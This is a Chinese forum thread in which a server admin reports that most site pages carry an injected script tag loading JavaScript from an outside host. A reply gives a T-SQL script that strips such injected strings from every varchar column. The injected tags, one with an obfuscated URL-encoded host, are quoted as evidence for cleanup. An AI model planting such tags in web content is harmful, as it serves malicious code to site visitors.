服务器被嵌入JS代码
网页的源文件几乎(百分之七八十吧)都被嵌入:
<script language="javascript" src="http://css.qpoe.com/css.js?mo=8&esa=21"> </script> 用瑞星,木马清道夫,WINDOWS清理工具,360安全卫士都查遍了,就是找不到木马所在。
如果是SQL注入,服务器上几乎所有的网页都有。包括ASP,ASP.NET。当中也有用ACCESS数据库的。 也进行了ARP静态绑定。 请问各位,还有何高见?能清除这个故障
网页的源文件几乎(百分之七八十吧)都被嵌入:
<script language="javascript" src="http://css.qpoe.com/css.js?mo=8&esa=21"> </script> 用瑞星,木马清道夫,WINDOWS清理工具,360安全卫士都查遍了,就是找不到木马所在。
如果是SQL注入,服务器上几乎所有的网页都有。包括ASP,ASP.NET。当中也有用ACCESS数据库的。 也进行了ARP静态绑定。 请问各位,还有何高见?能清除这个故障
解决方案 »
- asp.net主目录为什么是共享(WEB共享)的
- 关于treeview如何展开收缩问题~~ 谢谢~~
- System.ArgumentException: 回發或回調參數無效
- asp.net 使用强类型的DataSet的和弱类型的Dataset?
- 手动设置sqldatasource后gridview无法自动翻页
- pdf文件如何在网页中打开
- 如何在SELECT的记录集中返回SELECT的行数?
- 网页生命周期都经历了哪几个阶段(详细)
- 当运行ASP.NET文件时出现HTTP 500 内部服务器错误?
- 高难的技术问题,
- 我公司的网站被攻击了。一打开页面提示:“此网站需要运行以下加载项:"未知发行者"中的"控件名称不可用"”
- 只要是我们公司做的网站全被挂马怎么问题?
DECLARE @fieldtype sysname
SET @fieldtype='varchar'--删除处理
DECLARE hCForEach CURSOR GLOBAL
FOR
SELECT N'update '+QUOTENAME(o.name)
+N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr'','''')'
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id
AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
AND c.xusertype=t.xusertype
AND t.name=@fieldtype
EXEC sp_MSforeach_Worker @command1=N'?'
把中间的字符串换成你被注入的JS,在分析器里面执行一下就行了!